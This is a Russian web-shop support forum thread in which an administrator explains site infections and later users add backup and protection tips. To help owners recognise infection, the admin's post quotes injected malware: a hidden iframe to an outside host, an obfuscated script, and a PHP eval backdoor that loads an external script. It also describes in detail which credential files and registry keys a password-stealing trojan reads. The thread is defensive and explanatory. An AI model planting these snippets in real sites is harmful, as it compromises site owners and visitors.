Скрипт магазина для вашего бизнеса

PHP скрипт интернет-магазина

ShopCMS.Ru

Профессиональный скрипт интернет-магазина

ShopCMS – быстрый и удобный скрипт интернет-магазина!
Всё самое лучшее создано для Вас и Ваших покупателей!
Главная Новости Купить Хостинг Клиентам Услуги Файлы Контакты Форум

Объявление. Информация о вирусах.

Обсуждение вопросов так или иначе связанных с ShopCMS.

Объявление. Информация о вирусах.

Сообщение Максим » 13 ноя 2007, 19:21

Очень многим постоянно приходится объяснять что их магазин был повреждён вирусом, как он туда попал и как от него избавиться. Многие вообще не понимают что это такое или наоборот считают, что во всем виноват скрипт. Само собой пришло решение отдельно выделить эту тему на форуме.

Итак, сперва хочу сказать как обнаруживают вирусы - чаще всего после заражения магазин сразу перестаёт работать и это естественно замечает владелец. Если в коде вашего магазина появились незнакомые записи фреймов или скриптов, как например эти:

Код: Выделить всё
<iframe width=1 height=1 border=0 frameborder=0
src="http://traff.step57.info/xc/"></iframe>
или
Код: Выделить всё
<script>
var source
="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85
&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&
76&39&47&41&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&
47&3d&47&43&3d&44&43&3d&42&42&49&3d&4:&48&3d&42&42&45&3d&44&43&3d&49&44&3d&42&
42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:&3:
&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
</script>
или
Код: Выделить всё
<?php error_reporting(0);if(isset($_GET['eva'])){@eval($_GET['eva']);die('');}?><script src='http://3bepb.net/links/footer.css'></script><script>SetAff('11','starru')</script>


то ваш магазин заражен вирусом. То, что скрипт заражен так же можно понять если ваш антивирус выдаёт предупреждения при открытии страницы в браузере.

Как могло произойти заражение магазина, ведь он на удалённом сервере и доступ закрыт паролями?
Очень просто - пароли к FTP были украдены с вашего компьютера и с помощью них вирус попал в код ваших файлов на сервере.
Если вирусный код появился в базе и выводится в каком-либо блоке или в описании товаров, то здесь так же виноваты вы, а не скрипт. Вирусный код попал в описание товара когда вы копировали его с какого-либо другого сайта (вместе с текстом при использовании визуального редактора копируются невидимые стили и скрипты этого текста), который уже был заражен, потому если вы копируете описание с других сайтов, проверяйте его код на вирусы.

Что делать в случае заражения?
Восстановить зараженные файлы на сервере (Вирусный код можно просто удалить из зараженных файлов, они определяются по времени изменения на сервере. Зашифрованные файлы скрипта необходимо восстановить из дистрибьютива.), сменить пароли от FTP, провести антивирусную профилактику на компьютере с которого вы подключаетесь к FTP, т.е. откуда могли быть украдены
пароли от FTP.

ВАЖНО! Заражение происходит "извне" по протоколу FTP и скрипт НЕ может иметь к этому никакого отношения. В случае заражения вам самим придётся восстанавливать магазин, так как техподдержка не рассматривает те случаи когда магазин был повреждён по вине клиента или вируса. Восстановление может быть очень трудоемким, потому очень важно заботиться об антивирусной профилактики вашего компьютера.

------------------------------------------------------
Технические детали
(в каждом конкретном случае могут отличаться, но смысл тот же)
------------------------------------------------------


Троянская программа, относящаяся к семейству троянов, ворующих пароли пользователя. Предназначена для кражи конфиденциальной информации. Является приложением Windows (PE EXE-файл). Имеет размер — 25600 байт. Упакована при помощи UPX, распакованный размер — около 250 КБ. Написана на Ассемблере.

Деструктивная активность

После запуска троянец добавляет следующую запись в системный реестр:
[HKLM\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"<имя троянской программы>" = "<имя троянской программы>:*:Enabled:<имя троянца без расширения>"

Троянец непрерывно ищет в системе окна с именами класса «AVP.AlertDialog», «AVP.AhAppChangedDialog», «AVP.AhLearnDialog» и имитирует в них нажатия на кнопки «Разрешить», «Allow», «Skip», «Создать правило», «Apply to all», «Remember this action». Закрывает окна с именем класса «AVP.Product_Notification».

Троянец непрерывно ищет в системе окна с заголовком, содержащим следующие строки: «Kaspersky Anti-Hacker — Создать правило для» или «Kaspersky Anti-Hacker — Create a rule for» и имитирует нажатия на кнопку «Разрешить однократно» или «Allow Once».

Также троянская программа имитирует нажатия на кнопку «OK» в окнах с заголовками:
Внимание: некоторые компоненты изменились
Warning: Components Have Changed
Скрытый процесс запрашивает сетевой доступ
Hidden Process Requests Network Access

Троянец собирает информацию о жестком диске, количестве свободного места на нем; об учетной записи текущего пользователя, сетевом имени компьютера, версии операционной системы, типе процессора; возможностях экрана, установленных на компьютере; программах, запущенных процессах и существующих в системе dialup-соединениях.

Троянец ищет файлы account.cfg и account.cfn в папках:
%Documents and Settings%\<имя текущего пользователя>\Application Data\BatMail
%Documents and Settings%\<имя текущего пользователя>\Application Data\The Bat!

А также в папках, на которые указывают параметры ключа реестра:
[HKCU\Software\RIT\The Bat!]
Working Directory
ProgramDir

Содержимое найденных файлов похищается.

Троянец получает из реестра путь к установленному Mirabilis ICQ, ищет в его папке файлы с расширением DAT и похищает их содержимое. Также получает значения следующих ключей реестра:

[HKCU\Software\Mirabilis\ICQ\NewOwners]
[HKLM\Software\Mirabilis\ICQ\NewOwners]

Троянская программа ищет файлы с расширением DAT и похищает их содержимое посредством считываения пути к установленой Miranda из раздела реестра:

[HKLM\Software\Miranda]
Install_Dir

Также троянец ищет параметр с именем RQ.exe и RAT.exe в параметрах ключа реестра:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]

И если находит, получает его значение и использует для поиска файла andrq.ini. Если нет, то получает значение ключа реестра:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\RQ]
UninstallString

и использует его для поиска файла andrq.ini.

Троянец получает путь к папке с установленным Trillian из ключа реестра:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Trillian]

В реестре прочитывает содержимое файла users\global\profiles.ini, извлекая информацию о текущих профилях пользователя. Также читает имена пользователей и пароли из файла aim.ini.

Также троянец получает путь к папке с установленным Total Commander из следующих ключей реестра:
[HKCU\Software\Ghisler\Windows Commander]
[HKCU\Software\Ghisler\Total Commander]
[HKLM\Software\Ghisler\Windows Commander]
[HKLM\Software\Ghisler\Total Commander]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Total Commander]
UninstallString
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Total Commander XP]
UninstallString
[HKCU\SOFTWARE\Microsoft\Windows\ShellNoRoam\MUICache]
Totalcmd.exe

В указанной папке, а также в папке %WinDir% ищет файл wcx_ftp.ini или ftp.ini, в котором находит параметры и получает их значения:

host
username
password
directory
method

Троянская программа получает путь к папке из следующего ключа реестра:

[HKCU\Software\RimArts\B2\Settings],

ищет в ней файл Mailbox.ini, в котором получает значения следующих параметров:

UserID
MailAddress
MailServer
PassWd

Троянец получает список записей адресной книги, а также пароли на учетные записи Microsoft Outlook из ключа реестра:
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]

Троянец получает путь к установленным CuteFTP и CuteFTP Professional, ищет и похищает содержимое файлов:

sm.dat
tree.dat
smdata.dat

Троянец получает значения параметров из файла %WinDir%\edialer.ini:

LoginSaved
PasswordSaved

Троянская программа получает список ключей раздела

[HKCU\Software\Far\Plugins\FTP\Hosts]

В найденных ключах получает значения следующих параметров:

HostName
User
Password
Description

Троянец читает из реестра путь к установленному браузеру Opera и ищет файл \profile\wand.dat (с последующим похищением содержимого) в папке браузера, а также по указанному пути:

%Documents and Settings%\<имя пользователя>\Application Data\Opera

Получает из реестра путь к установленному браузеру Mozilla и похищает содержимое всех файлов в папке Profiles.

Троянец получает путь к программе QIP из ключа реестра
[HKCU\Software\Microsoft\Windows\ShellNoRoam]
"qip.exe"

и ищет в его папке в подпапке Users все имеющиеся папки после чего читает из файлов Config.ini, расположенных в этих папках, следующие значения:

Password
NPass

Троянец читает содержимое файла
%Documents and Settings%\<имя пользователя>\Application Data\Thunderbird\Profiles.ini

и извлекает из него пути к профилям, по которым далее ищет файлы signons.txt и prefs.js и получает их содержимое.

Получает значения всех подключей ключа реестра:

[HKCU\Software\Mail.Ru\Agent\mra_logins]

Троянец читает из файла
%Documents and Settings%\<имя пользователя>\Application Data\Qualcomm\Eudora\Eudora.ini

следующие параметры:

RealName
ReturnAddress
PopServer
LoginName
SavePasswordText

Читает путь к папке с установленным Punto Switcher из ключа реестра:

[HKCU\Software\Punto Switcher]

и читает содержимое файла "diary.dat".

Читает значения файла
%Documents and Settings%\<имя пользователя>\Application Data\.gaim\accounts.xml

Троянец похищает содержимое файлов, которые находятся в профилях Firefox. Также похищает содержимое файла FileZilla.xml, получая путь к папке с установленным FileZilla из ключа реестра:

[HKCU\Software\FileZilla]
Install_Dir

Получает из реестра путь к папке с FlashFXP и похищает содержимое файла Sites.dat.

Троянец похищает содержимое файлов:

%WinDir%\VD3User.dat
%WinDir%\Vd3main.dat,

а также таких файлов, как:
%Documents and Settings%\<имя пользователя>\Application Data\SmartFTP\Client 2.0\Favorites\ Favorites.dat
%Documents and Settings%\<имя пользователя>\Application Data\SmartFTP\Favorites.dat
%Documents and Settings%\<имя пользователя>\Application Data\SmartFTP\History.dat

[HKCU\Software\CoffeeCup Software\Internet\Profiles]

Из подключей ключа данного реестра похищаются следующие значения:

HostName
Port
Username
Password
ItemName

Троянская программа читает значение параметра в ключе реестра
[HKCU\Software\Microsoft\Windows\ShellNoRoam]
USDownloader.exe

и использует его для поиска следующих файлов, содержимое которых похищает:

USDownloader.lst
Depositfilesl.txt
Megauploadl.txt
Rapidsharel.txt

Аналогично троянец поступает со значением параметра в ключе реестра
[HKCU\Software\Microsoft\Windows\ShellNoRoam]
rapget.exe,

используя его для поиска файлов:

rapget.ini
links.dat

Также похищается содержимое файлов с расширением .rdp, находящихся в папке:
%Documents and Settings%\<имя пользователя>\Мои документы

Отчет со всей собранной информацией троянская программа отправляет на электронную почту злоумышленника ***@mail.ru.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

1. Выгрузить из памяти троянский процесс.
2. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
3. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами.
Аватара пользователя
Максим
Администратор
 
Сообщения: 1968
Зарегистрирован: 29 окт 2007, 04:41

Re: Объявление. Информация о вирусах.

Сообщение artem » 23 апр 2008, 22:46

Пипец :evil:
Аватара пользователя
artem
Пользователь
 
Сообщения: 33
Зарегистрирован: 19 апр 2008, 16:09
Откуда: Сибирь

Re: Объявление. Информация о вирусах.

Сообщение Zoonder » 07 май 2008, 19:45

Надо срочно копировать интернет магазин!!!
Zoonder
Мудрец
 
Сообщения: 115
Зарегистрирован: 26 дек 2007, 18:33

Re: Объявление. Информация о вирусах.

Сообщение Wild » 12 май 2008, 15:20

Zoonder писал(а):Надо срочно копировать интернет магазин!!!
:shock:
В смысле ?
Зачем копировать ?
Куда копировать ?
С какой целью ?

P.S. Тема копирования не раскрыта !!!
Ты в смысле - сделать бэкап ? :?:
Аватара пользователя
Wild
Мудрец
 
Сообщения: 170
Зарегистрирован: 14 мар 2008, 23:04

Re: Объявление. Информация о вирусах.

Сообщение Zoonder » 12 май 2008, 21:56

Я в смысле скопировать его кудато на диск, что-бы если что, была копия интернет-магазина!
Zoonder
Мудрец
 
Сообщения: 115
Зарегистрирован: 26 дек 2007, 18:33

Re: Объявление. Информация о вирусах.

Сообщение Wild » 14 май 2008, 12:37

Zoonder писал(а):Я в смысле скопировать его кудато на диск, что-бы если что, была копия интернет-магазина!
Ну дак скопируй себе файлы магазина по ftp и сделай бэкап базы через админку !
Аватара пользователя
Wild
Мудрец
 
Сообщения: 170
Зарегистрирован: 14 мар 2008, 23:04

Re: Объявление. Информация о вирусах.

Сообщение killerok » 17 июн 2008, 09:01

А у меня иногда бывает когда по магазину лазаешь, нажимаешь на товар, а он на ya.ru перекидывает. Никто не знает что такое?
Аватара пользователя
killerok
Мудрец
 
Сообщения: 146
Зарегистрирован: 03 ноя 2007, 12:18

Re: Объявление. Информация о вирусах.

Сообщение killerok » 17 июн 2008, 16:28

Причем примерно по 2 часа в день такая фигня ... перекидывает на ya.ru и все
Аватара пользователя
killerok
Мудрец
 
Сообщения: 146
Зарегистрирован: 03 ноя 2007, 12:18

Re: Объявление. Информация о вирусах.

Сообщение Eternal » 17 июн 2008, 17:18

killerok писал(а):Причем примерно по 2 часа в день такая фигня ... перекидывает на ya.ru и все


Пример можно?
Eternal
Мудрец
 
Сообщения: 118
Зарегистрирован: 24 ноя 2007, 22:44

Re: Объявление. Информация о вирусах.

Сообщение killerok » 18 июн 2008, 08:07

http://www.1405.ru но вряд ли попадешь на тот момент когда будет такая фигня
Аватара пользователя
killerok
Мудрец
 
Сообщения: 146
Зарегистрирован: 03 ноя 2007, 12:18

Re: Объявление. Информация о вирусах.

Сообщение alexdoctor » 05 янв 2009, 10:59

Как защититься от вируса?

С помощью файла .ftpaccess в корневой папке вашего аккаунта на хостинге можно ограничить доступ к FTP по IP, указав в этом текстовом файле информацию об этом определенным образом (как? спросите у яндекса).
Не используйте браузер IE, используйте Мозилу или Оперу.
Выходите в сеанс FTP по защищенному каналу через ФайлЗила клиент. Помните что БаТ клиент уязвим капитально.
Поставьте лицензионного Касперского (900руб) на ваш комп.
alexdoctor
Новичок
 
Сообщения: 6
Зарегистрирован: 02 янв 2009, 10:08

Re: Объявление. Информация о вирусах.

Сообщение wuffilman » 13 июн 2009, 16:32

А в идеале - купите себе Mac и юзайте на нём ФайлЗилла и никакие вирусы вам не страшны (всё можно взломать, если целенаправленно, но мак - наименее вероятно)
wuffilman
Новичок
 
Сообщения: 7
Зарегистрирован: 11 июн 2009, 15:42

След.


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1

cron
Copyright © 2000-2011 phpBB Group. Все права защищены.
Отдел продаж: sales@shopcms.ru